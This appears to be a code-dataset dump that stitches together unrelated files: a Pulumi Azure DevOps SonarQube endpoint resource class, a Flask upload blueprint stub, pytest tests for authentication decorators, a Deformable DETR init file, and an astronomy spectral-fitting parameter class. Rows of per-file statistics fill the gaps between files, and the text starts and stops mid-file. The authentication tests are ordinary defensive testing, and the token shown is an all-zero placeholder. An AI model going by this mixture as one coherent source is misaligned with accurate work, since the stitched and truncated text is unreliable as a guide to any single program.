Manages a SonarQube service endpoint within Azure DevOps.
## Example Usage
```python
import pulumi
import pulumi_azuredevops as azuredevops
project = azuredevops.Project("project",
visibility="private",
version_control="Git",
work_item_template="Agile")
serviceendpoint = azuredevops.ServiceEndpointSonarQube("serviceendpoint",
project_id=project.id,
service_endpoint_name="Sample SonarQube",
url="https://sonarqube.my.com",
token="0000000000000000000000000000000000000000",
description="Managed by Terraform")
```
## Relevant Links
* [Azure DevOps Service Connections](https://docs.microsoft.com/en-us/azure/devops/pipelines/library/service-endpoints?view=azure-devops&tabs=yaml)
* [SonarQube User Token](https://docs.sonarqube.org/latest/user-guide/user-token/)
## Import
Azure DevOps Service Endpoint SonarQube can be imported using the **projectID/serviceEndpointID**, e.g.
```sh
$ pulumi import azuredevops:index/serviceEndpointSonarQube:ServiceEndpointSonarQube serviceendpoint 00000000-0000-0000-0000-000000000000/00000000-0000-0000-0000-000000000000
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] description: The Service Endpoint description.
:param pulumi.Input[str] project_id: The project ID or project name.
:param pulumi.Input[str] service_endpoint_name: The Service Endpoint name.
:param pulumi.Input[str] token: Authentication Token generated through SonarQube (go to My Account > Security > Generate Tokens).
:param pulumi.Input[str] url: URL of the SonarQube server to connect with.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ServiceEndpointSonarQubeArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages a SonarQube service endpoint within Azure DevOps.
## Example Usage
```python
import pulumi
import pulumi_azuredevops as azuredevops
project = azuredevops.Project("project",
visibility="private",
version_control="Git",
work_item_template="Agile")
serviceendpoint = azuredevops.ServiceEndpointSonarQube("serviceendpoint",
project_id=project.id,
service_endpoint_name="Sample SonarQube",
url="https://sonarqube.my.com",
token="0000000000000000000000000000000000000000",
description="Managed by Terraform")
```
## Relevant Links
* [Azure DevOps Service Connections](https://docs.microsoft.com/en-us/azure/devops/pipelines/library/service-endpoints?view=azure-devops&tabs=yaml)
* [SonarQube User Token](https://docs.sonarqube.org/latest/user-guide/user-token/)
## Import
Azure DevOps Service Endpoint SonarQube can be imported using the **projectID/serviceEndpointID**, e.g.
```sh
$ pulumi import azuredevops:index/serviceEndpointSonarQube:ServiceEndpointSonarQube serviceendpoint 00000000-0000-0000-0000-000000000000/00000000-0000-0000-0000-000000000000
```
:param str resource_name: The name of the resource.
:param ServiceEndpointSonarQubeArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ServiceEndpointSonarQubeArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
authorization: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
description: Optional[pulumi.Input[str]] = None,
project_id: Optional[pulumi.Input[str]] = None,
service_endpoint_name: Optional[pulumi.Input[str]] = None,
token: Optional[pulumi.Input[str]] = None,
url: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ServiceEndpointSonarQubeArgs.__new__(ServiceEndpointSonarQubeArgs)
__props__.__dict__["authorization"] = authorization
__props__.__dict__["description"] = description
if project_id is None and not opts.urn:
raise TypeError("Missing required property 'project_id'")
__props__.__dict__["project_id"] = project_id
if service_endpoint_name is None and not opts.urn:
raise TypeError("Missing required property 'service_endpoint_name'")
__props__.__dict__["service_endpoint_name"] = service_endpoint_name
if token is None and not opts.urn:
raise TypeError("Missing required property 'token'")
__props__.__dict__["token"] = token
if url is None and not opts.urn:
raise TypeError("Missing required property 'url'")
__props__.__dict__["url"] = url
__props__.__dict__["token_hash"] = None
super(ServiceEndpointSonarQube, __self__).__init__(
'azuredevops:index/serviceEndpointSonarQube:ServiceEndpointSonarQube',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
authorization: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
description: Optional[pulumi.Input[str]] = None,
project_id: Optional[pulumi.Input[str]] = None,
service_endpoint_name: Optional[pulumi.Input[str]] = None,
token: Optional[pulumi.Input[str]] = None,
token_hash: Optional[pulumi.Input[str]] = None,
url: Optional[pulumi.Input[str]] = None) -> 'ServiceEndpointSonarQube':
"""
Get an existing ServiceEndpointSonarQube resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] description: The Service Endpoint description.
:param pulumi.Input[str] project_id: The project ID or project name.
:param pulumi.Input[str] service_endpoint_name: The Service Endpoint name.
:param pulumi.Input[str] token: Authentication Token generated through SonarQube (go to My Account > Security > Generate Tokens).
:param pulumi.Input[str] token_hash: A bcrypted hash of the attribute 'token'
:param pulumi.Input[str] url: URL of the SonarQube server to connect with.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ServiceEndpointSonarQubeState.__new__(_ServiceEndpointSonarQubeState)
__props__.__dict__["authorization"] = authorization
__props__.__dict__["description"] = description
__props__.__dict__["project_id"] = project_id
__props__.__dict__["service_endpoint_name"] = service_endpoint_name
__props__.__dict__["token"] = token
__props__.__dict__["token_hash"] = token_hash
__props__.__dict__["url"] = url
return ServiceEndpointSonarQube(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def authorization(self) -> pulumi.Output[Mapping[str, str]]:
return pulumi.get(self, "authorization")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
The Service Endpoint description.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="projectId")
def project_id(self) -> pulumi.Output[str]:
"""
The project ID or project name.
"""
return pulumi.get(self, "project_id")
@property
@pulumi.getter(name="serviceEndpointName")
def service_endpoint_name(self) -> pulumi.Output[str]:
"""
The Service Endpoint name.
"""
return pulumi.get(self, "service_endpoint_name")
@property
@pulumi.getter
def token(self) -> pulumi.Output[str]:
"""
Authentication Token generated through SonarQube (go to My Account > Security > Generate Tokens).
"""
return pulumi.get(self, "token")
@property
@pulumi.getter(name="tokenHash")
def token_hash(self) -> pulumi.Output[str]:
"""
A bcrypted hash of the attribute 'token'
"""
return pulumi.get(self, "token_hash")
@property
@pulumi.getter
def url(self) -> pulumi.Output[str]:
"""
URL of the SonarQube server to connect with.
"""
return pulumi.get(self, "url")
| 41.162338
| 182
| 0.644686
| 2,070
| 19,017
| 5.712077
| 0.095652
| 0.086519
| 0.097091
| 0.068843
| 0.821127
| 0.79567
| 0.774526
| 0.749662
| 0.725135
| 0.685132
| 0
| 0.014665
| 0.250565
| 19,017
| 461
| 183
| 41.251627
| 0.814973
| 0.308093
| 0
| 0.646825
| 1
| 0
| 0.098072
| 0.029505
| 0
| 0
| 0
| 0
| 0
| 1
| 0.15873
| false
| 0.003968
| 0.019841
| 0.011905
| 0.27381
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0ed57cc508b8e612c06778efa32dc45fe8ff0cba
| 192
|
py
|
Python
|
src/server/ModelUploadAPI.py
|
nikzagarwal/twentyone
|
d7426fc863773af9acca00c63099f064ed25b0e7
|
[
"MIT"
] | 9
|
2020-11-10T14:21:44.000Z
|
2021-10-02T13:12:50.000Z
|
src/server/ModelUploadAPI.py
|
Shubham2443/twentyone
|
5ac8a0e518a4249a84f8cb2f865437891b295c0d
|
[
"MIT"
] | null | null | null |
src/server/ModelUploadAPI.py
|
Shubham2443/twentyone
|
5ac8a0e518a4249a84f8cb2f865437891b295c0d
|
[
"MIT"
] | 7
|
2020-11-14T08:19:53.000Z
|
2021-08-11T14:41:37.000Z
|
from flask import Blueprint
model_upload_api = Blueprint('model_upload_api', __name__)
# Later
@model_upload_api.route("/model_upload")
def model_upload():
return "Model Upload Response"
| 24
| 58
| 0.786458
| 26
| 192
| 5.346154
| 0.5
| 0.47482
| 0.302158
| 0.330935
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.114583
| 192
| 8
| 59
| 24
| 0.817647
| 0.026042
| 0
| 0
| 0
| 0
| 0.268817
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| false
| 0
| 0.2
| 0.2
| 0.6
| 0.4
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
1609ab279af74e0741f5dc8b6d7dff8f8cef89a4
| 9,163
|
py
|
Python
|
v2/tests/security/test_decorators.py
|
jonfairbanks/rtsp-nvr
|
c770c77e74a062c63fb5e2419bc00a17543da332
|
[
"MIT"
] | 558
|
2017-10-04T14:33:18.000Z
|
2022-03-24T21:25:08.000Z
|
v2/tests/security/test_decorators.py
|
jonfairbanks/rtsp-nvr
|
c770c77e74a062c63fb5e2419bc00a17543da332
|
[
"MIT"
] | 22
|
2018-04-29T04:25:49.000Z
|
2021-08-02T17:26:02.000Z
|
v2/tests/security/test_decorators.py
|
jonfairbanks/rtsp-nvr
|
c770c77e74a062c63fb5e2419bc00a17543da332
|
[
"MIT"
] | 127
|
2017-11-14T19:47:27.000Z
|
2022-03-24T21:25:12.000Z
|
import pytest
from werkzeug.exceptions import Forbidden, Unauthorized
from backend.security.decorators import (
anonymous_user_required,
auth_required,
auth_required_same_user,
# roles_accepted, # tested by tests for auth_required
# roles_required, # tested by tests for auth_required
)
class MethodCalled(Exception):
pass
@pytest.mark.usefixtures('user')
class TestAnonymousUserDecorator:
def test_decorated_with_without_parenthesis(self):
@anonymous_user_required()
def method():
raise MethodCalled
with pytest.raises(MethodCalled):
method()
@anonymous_user_required
def method():
raise MethodCalled
with pytest.raises(MethodCalled):
method()
def test_authed_user_forbidden(self, client):
client.login_user()
@anonymous_user_required
def method():
raise MethodCalled
with pytest.raises(Forbidden):
method()
def test_anonymous_user_allowed(self):
@anonymous_user_required
def method():
raise MethodCalled
with pytest.raises(MethodCalled):
method()
@pytest.mark.usefixtures('user')
class TestAuthRequiredDecorator:
def test_decorated_with_without_parenthesis(self):
@auth_required()
def method():
raise MethodCalled
with pytest.raises(Unauthorized):
method()
@auth_required
def method():
raise MethodCalled
with pytest.raises(Unauthorized):
method()
def test_anonymous_user_unauthorized(self):
@auth_required
def method():
raise MethodCalled
with pytest.raises(Unauthorized):
method()
def test_authed_user_allowed(self, client):
client.login_user()
@auth_required
def method():
raise MethodCalled
with pytest.raises(MethodCalled):
method()
def test_with_role(self, client):
client.login_user()
@auth_required(role='ROLE_USER')
def method():
raise MethodCalled
with pytest.raises(MethodCalled):
method()
def test_without_role(self, client):
client.login_user()
@auth_required(role='ROLE_FAIL')
def method():
raise MethodCalled
with pytest.raises(Forbidden):
method()
def test_with_all_roles(self, client):
client.login_user()
@auth_required(roles=['ROLE_USER', 'ROLE_USER1'])
def method():
raise MethodCalled
with pytest.raises(MethodCalled):
method()
def test_without_all_roles(self, client):
client.login_user()
@auth_required(roles=['ROLE_USER', 'ROLE_FAIL'])
def method():
raise MethodCalled
with pytest.raises(Forbidden):
method()
def test_with_one_of_roles(self, client):
client.login_user()
@auth_required(one_of=['ROLE_USER', 'ROLE_FAIL'])
def method():
raise MethodCalled
with pytest.raises(MethodCalled):
method()
def test_without_one_of_roles(self, client):
client.login_user()
@auth_required(one_of=['ROLE_FAIL', 'ROLE_ALSO_FAIL'])
def method():
raise MethodCalled
with pytest.raises(Forbidden):
method()
def test_with_role_and_one_of_roles(self, client):
client.login_user()
@auth_required(role='ROLE_USER', one_of=['ROLE_FAIL', 'ROLE_USER1'])
def method():
raise MethodCalled
with pytest.raises(MethodCalled):
method()
@auth_required(roles=['ROLE_USER'], one_of=['ROLE_FAIL', 'ROLE_USER1'])
def method():
raise MethodCalled
with pytest.raises(MethodCalled):
method()
def test_without_role_and_one_of_roles(self, client):
client.login_user()
@auth_required(role='ROLE_FAIL', one_of=['ROLE_USER'])
def method():
raise MethodCalled
with pytest.raises(Forbidden):
method()
@auth_required(roles=['ROLE_FAIL'], one_of=['ROLE_USER'])
def method():
raise MethodCalled
with pytest.raises(Forbidden):
method()
@auth_required(role='ROLE_USER', one_of=['ROLE_FAIL'])
def method():
raise MethodCalled
with pytest.raises(Forbidden):
method()
@auth_required(roles=['ROLE_USER'], one_of=['ROLE_FAIL'])
def method():
raise MethodCalled
with pytest.raises(Forbidden):
method()
def test_with_role_and_and_one_of_roles(self, client):
client.login_user()
@auth_required(role='ROLE_USER', and_one_of=['ROLE_FAIL', 'ROLE_USER1'])
def method():
raise MethodCalled
with pytest.raises(MethodCalled):
method()
@auth_required(roles=['ROLE_USER'], and_one_of=['ROLE_FAIL', 'ROLE_USER1'])
def method():
raise MethodCalled
with pytest.raises(MethodCalled):
method()
def test_without_role_and_and_one_of_roles(self, client):
client.login_user()
@auth_required(role='ROLE_FAIL', and_one_of=['ROLE_USER'])
def method():
raise MethodCalled
with pytest.raises(Forbidden):
method()
@auth_required(roles=['ROLE_FAIL'], and_one_of=['ROLE_USER'])
def method():
raise MethodCalled
with pytest.raises(Forbidden):
method()
@auth_required(role='ROLE_USER', and_one_of=['ROLE_FAIL'])
def method():
raise MethodCalled
with pytest.raises(Forbidden):
method()
@auth_required(roles=['ROLE_USER'], and_one_of=['ROLE_FAIL'])
def method():
raise MethodCalled
with pytest.raises(Forbidden):
method()
def test_only_one_of_role_or_roles_allowed(self, client):
client.login_user()
with pytest.raises(RuntimeError) as e:
@auth_required(role='ROLE_USER', roles=['ROLE_USER1'])
def method():
raise MethodCalled
assert 'can only pass one of `role` or `roles` kwargs to auth_required' in str(e)
def test_only_one_of_one_of_or_and_one_of_allowed(self, client):
client.login_user()
with pytest.raises(RuntimeError) as e:
@auth_required(one_of=['ROLE_USER'], and_one_of=['ROLE_USER1'])
def method():
raise MethodCalled
assert 'can only pass one of `one_of` or `and_one_of` kwargs to auth_required' in str(e)
def test_works_with_token_auth(self, client, user):
client.login_as(user)
@auth_required(role='ROLE_USER')
def method():
raise MethodCalled
with pytest.raises(MethodCalled):
method()
@pytest.mark.models('User(user, admin)')
class TestAuthRequiredSameUser:
def test_different_user_forbidden(self, client, monkeypatch, models):
client.login_user()
monkeypatch.setattr('flask.request.view_args', {'id': models.admin.id})
@auth_required_same_user
def method():
raise MethodCalled
with pytest.raises(Forbidden):
method()
monkeypatch.undo()
def test_same_user_allowed(self, client, monkeypatch, models):
client.login_user()
monkeypatch.setattr('flask.request.view_args', {'id': models.user.id})
@auth_required_same_user
def method():
raise MethodCalled
with pytest.raises(MethodCalled):
method()
monkeypatch.undo()
def test_non_default_parameter_name(self, client, monkeypatch, models):
client.login_user()
monkeypatch.setattr('flask.request.view_args', {'user_id': models.user.id})
@auth_required_same_user('user_id')
def method():
raise MethodCalled
with pytest.raises(MethodCalled):
method()
monkeypatch.undo()
def test_it_accepts_auth_required_kwargs(self, client, monkeypatch, models):
client.login_user()
monkeypatch.setattr('flask.request.view_args', {'id': models.user.id})
@auth_required_same_user(role='ROLE_USER')
def method():
raise MethodCalled
with pytest.raises(MethodCalled):
method()
@auth_required_same_user(roles=['ROLE_FAIL'])
def method():
raise MethodCalled
with pytest.raises(Forbidden):
method()
@auth_required_same_user(one_of=['ROLE_USER', 'ROLE_FAIL'])
def method():
raise MethodCalled
with pytest.raises(MethodCalled):
method()
@auth_required_same_user(role='ROLE_USER', and_one_of=['ROLE_USER1', 'ROLE_FAIL'])
def method():
raise MethodCalled
with pytest.raises(MethodCalled):
method()
monkeypatch.undo()
| 26.33046
| 96
| 0.607552
| 986
| 9,163
| 5.371197
| 0.083164
| 0.088369
| 0.095166
| 0.176737
| 0.911254
| 0.865937
| 0.853097
| 0.825529
| 0.8125
| 0.799282
| 0
| 0.001233
| 0.291826
| 9,163
| 347
| 97
| 26.40634
| 0.814918
| 0.011241
| 0
| 0.734694
| 0
| 0
| 0.080729
| 0.01016
| 0
| 0
| 0
| 0
| 0.008163
| 1
| 0.240816
| false
| 0.012245
| 0.012245
| 0
| 0.269388
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
162303c4cea0a2c0c6ecd65143c28b1752cae49a
| 329
|
py
|
Python
|
datasets/torchvision_datasets/__init__.py
|
StephenStorm/DETReg
|
25ebc7792c7da4cc9c50a846149773b2684a040f
|
[
"Apache-2.0"
] | 1,454
|
2020-11-30T13:00:05.000Z
|
2022-03-31T13:06:38.000Z
|
datasets/torchvision_datasets/__init__.py
|
StephenStorm/DETReg
|
25ebc7792c7da4cc9c50a846149773b2684a040f
|
[
"Apache-2.0"
] | 127
|
2020-12-01T03:35:53.000Z
|
2022-03-24T08:59:17.000Z
|
datasets/torchvision_datasets/__init__.py
|
StephenStorm/DETReg
|
25ebc7792c7da4cc9c50a846149773b2684a040f
|
[
"Apache-2.0"
] | 275
|
2020-11-30T13:00:53.000Z
|
2022-03-29T14:49:46.000Z
|
# ------------------------------------------------------------------------
# Deformable DETR
# Copyright (c) 2020 SenseTime. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 [see LICENSE for details]
# ------------------------------------------------------------------------
from .coco import CocoDetection
| 41.125
| 74
| 0.422492
| 25
| 329
| 5.56
| 0.96
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.020202
| 0.097264
| 329
| 7
| 75
| 47
| 0.447811
| 0.866261
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
16df3fb475bd553e5b6ffbb83bddf37b9774375b
| 25,844
|
py
|
Python
|
Engine/classes.py
|
dfm/igrins_rv
|
79aa31035bdc576c6c2ff05b6042146afaff49ac
|
[
"MIT"
] | null | null | null |
Engine/classes.py
|
dfm/igrins_rv
|
79aa31035bdc576c6c2ff05b6042146afaff49ac
|
[
"MIT"
] | null | null | null |
Engine/classes.py
|
dfm/igrins_rv
|
79aa31035bdc576c6c2ff05b6042146afaff49ac
|
[
"MIT"
] | null | null | null |
# These classes are all for convenient passing of variables between the main code, the telluric spectrum fitter, and the model function.
import numpy as np
class fitobjs:
def __init__(self,s, x, u,continuum,watm_in,satm_in,mflux_in,mwave_in,mask,masterbeam,CRmask):
self.s = s
self.x = x
self.u = u
self.continuum = continuum
self.watm_in = watm_in
self.satm_in = satm_in
self.mflux_in = mflux_in
self.mwave_in = mwave_in
self.mask = mask
self.masterbeam = masterbeam
self.CRmask = CRmask
class inparams:
def __init__(self,inpath,outpath,initvsini,vsinivary,plotfigs,initguesses,bvcs,tagsA,tagsB,nights,mwave,mflux,a0dict,xbounddict,maskdict):
self.inpath = inpath
self.outpath = outpath
self.initvsini = initvsini
self.vsinivary = vsinivary
self.plotfigs = plotfigs
self.initguesses = initguesses
self.bvcs = bvcs
self.tagsA = tagsA
self.tagsB = tagsB
self.mwave0 = mwave
self.mflux0 = mflux
self.nights = nights
self.a0dict = a0dict
self.xbounddict = xbounddict
self.maskdict = maskdict
self.ips_tightmount_pars = { 'H':{
'A':{
6: np.array([-0.0000014645, +0.0017169700, +3.3011855894]),
13: np.array([-0.0000012994, +0.0006988905, +3.0840663439]),
14: np.array([-0.0000009176, +0.0018138177, +2.2197275274]),
16: np.array([-0.0000013663, +0.0029909793, +1.3959663664]),
21: np.array([-0.0000013358, +0.0024666477, +1.5425597030]),
22: np.array([-0.0000013951, +0.0029079030, +1.2131742554]),
2: np.array([-0.0000011308, +0.0019048124, +3.1673497542]),
3: np.array([-0.0000006216, +0.0004114534, +3.4773458923]),
4: np.array([-0.0000018462, +0.0027342132, +2.9057196779]),
20: np.array([-0.0000005747, +0.0010462689, +2.0063265625])},
'B':{
6: np.array([-0.0000017946, +0.0022191895, +3.7021645256]),
13: np.array([-0.0000018206, +0.0013364410, +3.3651564498]),
14: np.array([-0.0000009673, +0.0015895234, +2.9497750941]),
16: np.array([-0.0000011332, +0.0020813780, +2.4512905616]),
21: np.array([-0.0000015200, +0.0026951579, +1.8089261830]),
22: np.array([-0.0000017253, +0.0035481206, +1.2235501417]),
2: np.array([-0.0000011552, +0.0017634890, +3.8604002255]),
3: np.array([-0.0000006966, +0.0003965295, +4.0969467142]),
4: np.array([-0.0000020779, +0.0029574695, +3.3703599880]),
20: np.array([-0.0000010270, +0.0019515216, +1.9071269518])}
},
'K':{
'A':{
3: np.array([+0.0000000000, -0.0013882852, +2.6491516427]),
4: np.array([+0.0000005570, -0.0014798964, +3.0322123928]),
5: np.array([+0.0000007815, -0.0018286569, +3.1884587077]),
6: np.array([+0.0000000223, -0.0002438801, +2.5610056734]),
2: np.array([+0.0000018993, -0.0041545122, +3.2722615480]),
7: np.array([+0.0000003846, -0.0008248737, +2.7054577962]),
8: np.array([+0.0000006032, -0.0011831188, +2.7613774604]),
10: np.array([-0.0000002109, +0.0008841434, +1.2082829518]),
14: np.array([+0.0000007984, -0.0020449382, +3.1101522478]),
16: np.array([+0.0000001490, +0.0009528175, +1.1385210594]) },
'B':{
3: np.array([+0.0000000000, -0.0015962816, +3.1179187408]),
4: np.array([+0.0000006349, -0.0021247257, +3.7189580576]),
5: np.array([+0.0000009365, -0.0026350831, +3.9078691486]),
6: np.array([+0.0000003213, -0.0013484977, +3.3906863460]),
2: np.array([+0.0000017922, -0.0041528862, +3.4063864564]),
7: np.array([+0.0000005729, -0.0016962859, +3.4733681135]),
8: np.array([+0.0000007786, -0.0020117585, +3.4821592021]),
10: np.array([-0.0000001630, +0.0003023356, +1.8355214070]),
14: np.array([+0.0000006373, -0.0022195328, +3.4337657140]),
16: np.array([+0.0000000959, +0.0007723205, +1.3240275178]) }
}
}
self.ips_loosemount_pars = { 'H':{
'A':{
6: np.array([-0.0000016233, +0.0020134037, +3.3487332787]),
13: np.array([-0.0000016702, +0.0011352918, +3.1532836476]),
14: np.array([-0.0000007901, +0.0014705165, +2.5939805593]),
16: np.array([-0.0000014554, +0.0032034428, +1.4193023750]),
21: np.array([-0.0000013562, +0.0024241969, +1.7204152786]),
22: np.array([-0.0000015438, +0.0032647489, +1.1711140400]),
2: np.array([-0.0000007673, +0.0011908119, +3.5574747235]),
3: np.array([-0.0000004539, +0.0000711467, +3.7569496247]),
4: np.array([-0.0000017014, +0.0022235883, +3.3469057729]),
20: np.array([-0.0000011548, +0.0024159347, +1.4899767054])},
'B':{
6: np.array([-0.0000017564, +0.0020515363, +4.0061364082]),
13: np.array([-0.0000020047, +0.0015672027, +3.4707598384]),
14: np.array([-0.0000008056, +0.0012756590, +3.2498824876]),
16: np.array([-0.0000013302, +0.0026174646, +2.2733250373]),
21: np.array([-0.0000015477, +0.0028004919, +1.8687160412]),
22: np.array([-0.0000018236, +0.0037493865, +1.2926912294]),
2: np.array([-0.0000009144, +0.0012463162, +4.2410289004]),
3: np.array([-0.0000005587, +0.0001065024, +4.3728963431]),
4: np.array([-0.0000021505, +0.0029466667, +3.6128512030]),
20: np.array([-0.0000014158, +0.0027485459, +1.7502302932])}
},
'K':{
'A':{
3: np.array([+0.0000000000, -0.0032224396, +5.8539233388]),
4: np.array([+0.0000009369, -0.0042696048, +6.7611052624]),
5: np.array([+0.0000010962, -0.0044543760, +6.7225421397]),
6: np.array([+0.0000003577, -0.0027097128, +5.7789655657]),
2: np.array([+0.0000000173, -0.0019826425, +4.8330715369]),
7: np.array([+0.0000008492, -0.0035313488, +5.9016867272]),
8: np.array([+0.0000010973, -0.0038178120, +5.6832992738]),
10: np.array([+0.0000002443, -0.0017360668, +4.1415859150]),
14: np.array([+0.0000015291, -0.0039022985, +4.6823412563]),
16: np.array([+0.0000003064, -0.0001454813, +2.0998323933]) },
'B':{
3: np.array([+0.0000000000, -0.0033096773, +6.6865750935]),
4: np.array([+0.0000004442, -0.0034871860, +7.1654729260]),
5: np.array([+0.0000006937, -0.0038708805, +7.1443293518]),
6: np.array([-0.0000005376, -0.0011557174, +5.8402964783]),
2: np.array([-0.0000001693, -0.0021423525, +5.9778102108]),
7: np.array([+0.0000006778, -0.0035919133, +6.7264063526]),
8: np.array([+0.0000010518, -0.0041659367, +6.6036171357]),
10: np.array([+0.0000000258, -0.0016619486, +4.7519124026]),
14: np.array([-0.0000007761, -0.0001818842, +3.9448840447]),
16: np.array([+0.0000002462, -0.0002856080, +2.5831334692])}
}
}
# old H tight~ 0.0149323 , 0.02518648, 0.00716132, 0.00592511, 0.04312596, 0.0075384
# 6 14 16 21 22
self.methodvariance_tight = { 'H': np.array([0.01145274, 0.00897732, 0.00569098, 0.05562397, 0.0049196]),
# 3 4 5 6
'K': np.array([0.00184696, 0.0016166, 0.00291516, 0.00139631])
}
self.methodvariance_loose = { 'H': np.array([0.01145274, 0.00897732, 0.00569098, 0.05562397, 0.0049196]),
'K': np.array([0.0110391, 0.02206625, 0.00439241, 0.00070363])
}
self.bound_cut_dic ={ 'H':{
6: [425, 200],
10: [250, 150],
11: [600, 150],
#13: [200, 600],
13: [250, 750],
14: [750, 100],
16: [530, 100],
17: [1000,100],
20: [500, 150],
21: [200, 150],
22: [200, 150]},
'K':{
3: [150, 1350],
13: [200, 400],
14: [200, 400]}
}
class inparamsA0:
def __init__(self,inpath,outpath,plotfigs,tags,nights,humids,temps,zds,press,obs,watm,satm,mwave,mflux,cdbsloc,xbounddict,maskdict):
self.inpath = inpath
self.outpath = outpath
self.plotfigs = plotfigs
self.tags = tags
self.humids = humids
self.temps = temps
self.zds = zds
self.press = press
self.obses = obs
self.watm = watm
self.satm = satm
self.mwave0 = mwave
self.mflux0 = mflux
self.nights = nights
self.cdbsloc = cdbsloc
self.xbounddict = xbounddict
self.maskdict = maskdict
self.maskdict = maskdict
self.ips_tightmount_pars = { 'H':{
'A':{
6: np.array([-0.0000014645, +0.0017169700, +3.3011855894]),
13: np.array([-0.0000012994, +0.0006988905, +3.0840663439]),
14: np.array([-0.0000009176, +0.0018138177, +2.2197275274]),
16: np.array([-0.0000013663, +0.0029909793, +1.3959663664]),
21: np.array([-0.0000013358, +0.0024666477, +1.5425597030]),
22: np.array([-0.0000013951, +0.0029079030, +1.2131742554]),
2: np.array([-0.0000011308, +0.0019048124, +3.1673497542]),
3: np.array([-0.0000006216, +0.0004114534, +3.4773458923]),
4: np.array([-0.0000018462, +0.0027342132, +2.9057196779]),
20: np.array([-0.0000005747, +0.0010462689, +2.0063265625])},
'B':{
6: np.array([-0.0000017946, +0.0022191895, +3.7021645256]),
13: np.array([-0.0000018206, +0.0013364410, +3.3651564498]),
14: np.array([-0.0000009673, +0.0015895234, +2.9497750941]),
16: np.array([-0.0000011332, +0.0020813780, +2.4512905616]),
21: np.array([-0.0000015200, +0.0026951579, +1.8089261830]),
22: np.array([-0.0000017253, +0.0035481206, +1.2235501417]),
2: np.array([-0.0000011552, +0.0017634890, +3.8604002255]),
3: np.array([-0.0000006966, +0.0003965295, +4.0969467142]),
4: np.array([-0.0000020779, +0.0029574695, +3.3703599880]),
20: np.array([-0.0000010270, +0.0019515216, +1.9071269518])}
},
'K':{
'A':{
3: np.array([+0.0000000000, -0.0013882852, +2.6491516427]),
4: np.array([+0.0000005570, -0.0014798964, +3.0322123928]),
5: np.array([+0.0000007815, -0.0018286569, +3.1884587077]),
6: np.array([+0.0000000223, -0.0002438801, +2.5610056734]),
2: np.array([+0.0000018993, -0.0041545122, +3.2722615480]),
7: np.array([+0.0000003846, -0.0008248737, +2.7054577962]),
8: np.array([+0.0000006032, -0.0011831188, +2.7613774604]),
10: np.array([-0.0000002109, +0.0008841434, +1.2082829518]),
14: np.array([+0.0000007984, -0.0020449382, +3.1101522478]),
16: np.array([+0.0000001490, +0.0009528175, +1.1385210594]) },
'B':{
3: np.array([+0.0000000000, -0.0015962816, +3.1179187408]),
4: np.array([+0.0000006349, -0.0021247257, +3.7189580576]),
5: np.array([+0.0000009365, -0.0026350831, +3.9078691486]),
6: np.array([+0.0000003213, -0.0013484977, +3.3906863460]),
2: np.array([+0.0000017922, -0.0041528862, +3.4063864564]),
7: np.array([+0.0000005729, -0.0016962859, +3.4733681135]),
8: np.array([+0.0000007786, -0.0020117585, +3.4821592021]),
